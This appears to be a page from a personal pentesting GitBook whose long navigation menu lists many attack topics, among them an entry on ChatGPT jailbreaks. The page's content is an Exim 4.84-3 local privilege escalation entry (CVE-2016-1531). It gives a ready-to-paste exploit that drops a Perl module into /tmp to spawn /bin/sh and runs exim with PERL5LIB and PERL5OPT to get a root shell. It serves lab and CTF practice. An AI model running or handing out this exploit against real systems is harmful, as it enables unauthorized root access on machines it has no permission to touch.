๐Ÿฉธ
Pentesting Notes
  • ใŠ™๏ธr3dcl1ff
    • ๐Ÿ”ฌEnumeration
      • FTP 21
      • SSH 22
      • Telnet 23 - 2323
      • SMTP 25
      • DNS 53
      • 80 http
        • /phpbash.php
        • inspecting source | Devtools
        • toolbar that allows to run commands on target
        • Wordpress Enumeration
          • Extra commands
          • WPScan one-liners
          • Plugins & Themes exploitation
            • AdRotate
            • Tsumugi 404.php
            • Twentytwenty (Theme)
            • Woody AD Snippets
            • Activity monitor 2
            • wp.spritz
            • Social Warfare
            • Mail Masta 1.0
            • Twentyfourteen
          • CVE-2020-35489 Contact Form 7
          • one-liners
          • CVE-2023-23488
          • nmap
          • Common directories
          • MoveStore API Auth bypass
        • Drupal
        • Koken CMS
        • Codiad
        • /.git
        • Subrion CMS 4.2.1
        • Fuel CMS
        • phpmyadmin
        • /cgi-bin Shellshock
        • Sar2HTML
        • Cute News
        • Nagios
        • Joomla
        • advanced_component_system
        • webdav
        • OTRS 5.0
        • Apache James
        • Ovidentia
        • Cuppa CMS
        • Phreebooks
        • Elastix 2.2.0
        • ApPHP MicroBlog
        • MongoDB 2.2.3
        • CMS Made Simple 2.2.13
        • Jinja2
        • Webmin
        • robots.txt
        • BuilderEngine 3.5.0 Remote Code Execution via elFinder 2.0
        • Squid proxy
        • simfony CMS
        • C-Panel Reflected XSS - CVE-2023-294
        • vBulletin <= 5.6.9: Pre-authentication Remote Code Execution
      • 88 Kerberos
      • Pop 110-995
      • RPC 111
      • Ident 113
      • NNTP 119
      • NETBios 137-138
      • SMB-Samba 135-139 445
      • MSRPC 135
      • SNMP 161
      • LDAP - 389,636
      • Modbus 502
      • OpenSSL 1337
      • Ms-SQL 1433
      • Oracle Listener 1521 1522 1529
      • NFS 2049
      • MySql 3306
      • RDP 3389
      • ADB Android Debug Bridge 5555
      • WinRM 5985 5986
      • VNC 5800 5900
      • Redis 6379
      • Unreal IRC 6667
      • Tomcat 8080
      • MongoDB 27017
      • Webapp Enum Methodology
      • IIS
    • ๐ŸงจExploitation (deprecated node)
      • Password cracking
        • common passwords
        • online resources
        • hashID
        • john
        • Hashcat
        • Cewl
        • Cupp
        • Hydra
        • fcrackzip
        • Medusa
        • Bash for password creation | cracking
        • Cracking netcat connection
        • Crunch
        • haklistgen
      • Data wrappers
      • Reverse shells
      • Client side attacks
        • msfvenom hta attack
        • MSOffice macro attack
          • Metasploit Office Macro
        • HTML application attack
      • Log poisoning
      • ๐Ÿ“กWireless attacks
      • DoS Denial of Service
      • Microsoft Exchange Pentesting
    • ๐ŸˆฒPrivesc
      • sudo + GTFObins
        • sudo /bin/bash
        • /bin/rpm
        • /usr/bin/gdb
        • /usr/bin/php7.2
        • sudo -u#-1 /bin/bash
        • jjs
        • /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.242.b08-0.el7_7.x86_64/jre/bin/java
        • /usr/bin/vim
        • /usr/bin/tee
        • /usr/bin/nice
        • /usr/bin/dd
        • nmap
        • /usr/bin/zip
        • /usr/bin/date
        • /usr/bin/base32
        • /usr/sbin/hping3
        • /usr/bin/cpulimit
        • /usr/bin/python
        • /etc/passwd
        • echo /bin/bash to executable file
        • /usr/bin/find
        • sudo_inject
        • /bin/systemctl
        • less
        • /bin/ash
        • awk
        • scp
        • man
        • ftp
        • knife
        • /usr/sbin/iftop
        • /usr/bin/nano
        • ed
        • openssl (read file)
        • tar
        • flock
        • expect
        • socat
        • Perl
        • /usr/bin/env
        • strace
      • Docker privilege escalation
      • Kernel Exploits
        • Compiling - General guidelines
        • Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27)
        • LXD - Alpine
        • Serv-U FTP Server < 15.1.7
        • [CVE-2016-5195] dirtycow 2
        • Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5...)
        • Linux Kernel 2.6.39 "Mempodipper"
        • Samba 2.2.x - Remote buffer overflow
        • Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' /proc/self/mem Race Condition (Write Access Method)
        • Full Nelson
        • Exim 4.84-3 - Local Privilege Escalation
        • Clown NewUser|Linux 3.0<3.3.5|
        • fasync_helper|Linux Kernel <2.6.28
        • NFS no_root_squash/no_all_squash
      • 'Nix manual enumeration
      • File transfers
        • Windows file transfers
          • Certutil
          • VBScript
          • Powershell
          • pyftpdlib
          • impacket
          • exe2hex
          • php exfil | Win --> Kali
          • http transfers
        • 'Nix file transfers
      • Windows enumeration
        • Automated scripts
      • Wordpress privesc
      • OpenSSL privesc
      • Privesc scripts | resources
        • Linux Exploit suggester
        • Vulmap
      • vi
    • ๐Ÿ–ฅ๏ธCLI-Fu
      • Moving around
      • mkdir
      • find sort grep uniq awk
      • head tail sed cut
      • tar-zip
      • Fucking Vim
      • 'Nix | Windows CLI comparison
    • ๐ŸŽฏOSINT
      • ๐Ÿ“งEmail OSINT
        • HaveIbeenPWND
        • TheHarvester
        • O365
        • Suspicious Email analysis
          • Websites
        • H8mail
      • Recon-NG
      • ๐Ÿฅ‹Shodan
        • Ransomware search
        • Shodan Galore
        • Assorted queries (short)
        • Mindmap
        • โ›“๏ธCompound commands
        • Assorted tricks for BBP
      • ๐Ÿ•ธ๏ธSpiderfoot
      • Metagoofil
      • Websites
        • Fofa
      • โ„น๏ธFavicon OSINT
      • Username Enum
        • Nexfil
        • Blackbird
        • Sherlock
        • DetectDee
      • Greynoise
      • ๐Ÿ—ฃ๏ธChatGPT Jailbreaks
      • Postman
        • Postmaniac
        • Porch-Pirate
      • Google dorks
        • Basic Dorks
        • Dorks -Bug bounty edition-
        • Extra dorks
        • Automated tools
          • ๐ŸšShell script for automated dorking
          • GooFuzz
          • go-dork
      • SOCMINT
        • U-Scrapper
        • Telegram OSINT
        • one-plus OSINT
      • Censys
      • โ˜Ž๏ธPhone OSINT
    • ๐Ÿ› ๏ธTools
      • netcat
      • ncat
      • Socat
      • ๐Ÿ’ปAssorted scripts
        • Buffer Overflows
          • Windows Bof
        • Mitigation script CVE 2022-41040
      • Bash Voodoo
      • ๐ŸฆˆWireshark
      • Aircrack-ng
      • TCPDump
      • cloudflare Bypass
      • Shuffledns
    • ๐ŸŸฆActive Directory
      • Enumeration
        • ADRecon.ps1
        • Power View
        • Manual Enum basics
        • ๐ŸฆฎBloodhound
      • Mimikatz
      • ๐Ÿบkerberoasting
      • Pass-the-hash
    • ๐Ÿช“Sysadmin
      • Pimp my kali
      • Random commands
    • ๐Ÿ—’๏ธPentesting Checklist(s)
      • ๐ŸขInternal Pentest Checklist
        • Rules of engagement
        • Recon
        • Social Engineering
          • Phishing
            • Evilurl
            • Sendemail
            • urlcrazy
            • Website Cloning
            • Detect Phishing sites in real time
            • Homograph attacks
              • DNSTwist
            • URL Masking
            • Email OSINT
            • Test deliverability before campaign
            • Spoofing with python
            • Deepfake
            • HTML Templates
              • Win10 simple html
    • ๐Ÿ•ท๏ธWebApp Pentest
      • Vuln scanners
        • Tenable Nessus
        • Sn1per
        • OpenVAS
        • nuclei
        • ๐Ÿ•ท๏ธBlack Widow
        • Cariddi
        • ๐Ÿค–BBOT
      • Attack Surface Recon
        • Subdomain-enum
          • Scilla
          • Amass
          • Sublist3r
          • Assetfinder
          • Subfinder
        • DNS permutations
          • PureDNS
          • TLSx
          • MassDNS
          • AltDNS
          • shuffleDNS
          • DNSValidator
        • Legacy tools
          • Fierce
          • DNS Recon
          • Dig
          • DNSAudit
        • Hakluke
          • Hakrevdns
          • hakip2host
          • Hakoriginfinder
        • ffuf
        • One liners
        • Wordlists and Resolvers
        • IPinfo
        • ๐ŸงพScripts
          • TLD enum Script
          • Bugbounty Subdomain enum script
        • ๐Ÿ‡ณ๐Ÿ‡ดgungnir
        • NMAP
        • Hednsextractor
        • Caduceus
      • Port scanning
        • NMAP
        • Naabu
        • masscan
        • nmapAutomator
        • smap (shodan Nmap)
      • Subdomain Bruteforcing + crawling
        • Katana
        • LogSensor
        • jsubfinder
      • File inclusion
        • Liffy
        • LFISuite
        • CRLFI
        • LFI - Theory & basic commands
        • RFI - Theory & basic commands
        • one liners
        • HTTPX
        • Dorks
      • โชTraversal
        • Path Traversal
          • Windows Directory traversal
          • Linux Directory traversal
        • dotdotPWN
      • Content Discovery
        • gobuster
        • dirb
        • Gospider
        • Hakrawler
        • webpalm
        • OpenDoor
        • Feroxbuster
        • httpx
        • JS File Analysis and Scraping
      • Fuzzing
        • wfuzz
        • ffuf
        • Fuzzing Wordlists
        • Fuzzuli (fuzz backup files)
        • find hidden directories
        • Headers Fuzzing (headerpwn)
      • Parameters
        • Arjun
        • Paramspider
        • X8
      • Open redirect
        • Oralyzer.py
        • Dom-Red
        • OpenRedireX
        • Dorks
      • HTTP Request Smuggling
        • smuggler
        • http-request smuggler
        • h2csmuggler
      • Server Side Request Forgery
        • SSRFMap
        • ๐Ÿ„โ€โ™‚๏ธSurf
        • one-liners
        • Top parameters
        • Dorks
      • ๐Ÿ’‰SQLi
        • SQLi (Manual testing)
          • Login bypass
          • URL enum
          • Oracle SQLi
          • SQLi to code execution
          • Ghauri
        • SqlMap
        • One-liners
        • CVEs
          • CVE-2023-25157: CVE-2023-25157 - GeoServer SQL Injection
        • Dorks
      • XSS Cross Site Scripting
        • XXS manual testing
        • PWN-XSS
        • ๐ŸฆŠDalfox
        • PrototypePollution to XSS
        • one-liners
        • Gxss
        • XSStrike
        • Embed XSS payload into image file
        • WAF Bypass 2024
          • Extra payloads
        • Knoxss + knoxsnl
        • Dorks
      • Links
        • GAU Get All URLs
        • Waybackurl
      • Git
        • gitjacker
        • github-subdomains
        • GitGot
        • ๐Ÿ—Trufflehog
        • Github-Dorks
        • git-dumper
      • Text manipulation
        • qsreplace (Tomnomnom)
        • anew (Tomnomnom)
        • Jq (JSON parser)
        • Urldedupe
        • Gf
      • CORS
        • Corsy COR misconfigs scanner
        • One-liners
        • CORScanner
      • CSRF Cross Site Request Forgery
        • XSRFProbe
      • Assorted
        • CMSMap
        • Mantra (secrets crawler)
        • CMSeek
        • web-screenshots using nuclei
        • SecretsFinder
      • Screenshots
        • ๐ŸŒŠAquatone
        • gowitness
      • Command Injection
        • Commix
      • SSTI
        • SSTIMap
      • IDOR
      • Bypass 40X
        • 403Jump
        • nomore403
      • Subdomain Takeover
        • NTHIM Now The Host Is Mine
        • Subzy
      • Headers Security
        • Hauditor
        • Header injection (Headi)
        • Manual checks
      • ๐ŸAPI pentesting
        • Swagger Jacker
        • Google Dorks
      • RCE
    • ๐ŸŒฉ๏ธCloud
      • Enum
        • ๐Ÿ‘ฟTenant Hunter (Azure specific)
        • S3scanner
        • Cloud_enum
        • BucketLoot
    • ๐Ÿง Threat Intel
      • ๐ŸŒ‘Darknet + Tor resources
        • deepDarkCTI
        • Awesome darknet
        • ๐Ÿ‘ฟTheDevilsEye
        • Dark Web OSINT tools
        • DarknetEye - Tor Links
        • Ransomware TTPs
        • APTs resources
      • Interactive maps
        • APT map
        • Shodan ICS attack map
        • Global data on ransomware attacks
      • Malware analysis
        • Cuckoo
      • Phishing URL check
    • ๐Ÿ“ŸIoT / IIoT
      • Github Repos
      • Commercial Frameworks
      • Exploitation frameworks
        • Routersploit
        • Genzai
      • Flipper Zero
        • Repos and resources
      • UEFI Pentesting
        • Qiling
        • Resources adn repos
      • Bluetooth
        • Bluing
    • ๐ŸญICS/OT - SCADA
      • Active Enumeration
        • Cisco-Torch
        • Nmap
          • HVAC 80
          • Siemens S7 102
          • DICOM 104
          • ATG 443
          • Modbus - Schneider 502
          • MQTT 1883
          • NiagaraFox 1911
          • PCWorx 1962
          • CSPv4 2222
          • IEC 2404
          • Mitsubishi Electric MELSEC PLC 5006
          • Omron 9600
          • DNP3 20000 (TCP-UDP)
          • Knx-gateway 3671
          • ProConOS 20547
          • Rockwell Automation Allen-Bradley 44818
          • Bacnet 47808
        • OSINT
        • Passwords and creds
          • SCADAPASS
        • Metasploit
      • Passive Enumeration
        • Grassmarlin
        • Siemens Simatic PCS 7 Hardening Tool
        • tshark
      • Hardware / Lab setup
        • ClickPLC Plus
      • Github repos and resources
        • online resources
        • Github repos
    • ๐ŸฉปPrivate Templates
      • CVE-2024-6387
      • CORS Misconfig
      • CVE-2024-34750
      • CVE-2024-6409 Race Condition in OpenSSH 8.7p1,8.8p1
      • Symfony F#ck U
      • CVE-2024-40725
      • SSRF check
      • Gavazzi Automation UWP 3.0
      • Siemens Simatic PLC
      • CVE-2024-7339
      • Frontpage-exposures
      • in-tank IIoT exposure
      • unauth-VNC
      • Rockwell-Allen-Bradley PLC Detect
      • Hipcam IoT Camera Detect
      • CVE-2024-43044
      • Ivanti-CSA-detect
      • CVE-2024-8190 (Ivanti Command Injection)
      • CVE-2024-38812
      • DB-Dump-Detect
      • Linux Fuzz
      • detect-config.ini
      • Laravel-log
    • ๐ŸžBBP
  • Daily Syncs
    • Design Standups
      • September 2021
        • Week 1 (6 - 10 Sept)
  • Weekly Syncs
    • Company Weeklies
      • 1st September 2021
  • Other Regulars
    • Company Weeklies
      • September 14th 2021
Powered by GitBook
On this page
  1. r3dcl1ff
  2. Privesc
  3. Kernel Exploits

Exim 4.84-3 - Local Privilege Escalation

You can write files as root or force a perl module to load by manipulating the perl environment and running exim with the "perl_startup" arguement -ps.

https://g0blin.co.uk/pluck-vulnhub-writeup/

#Paste this in one go and get #root, no need to run each command separately. 

echo [ CVE-2016-1531 local root exploit
cat > /tmp/root.pm << EOF
package root;
use strict;
use warnings;

system("/bin/sh");
EOF
PERL5LIB=/tmp PERL5OPT=-Mroot /usr/exim/bin/exim -ps
PreviousFull NelsonNextClown NewUser|Linux 3.0<3.3.5|

Last updated 2 years ago

ใŠ™๏ธ
๐Ÿˆฒ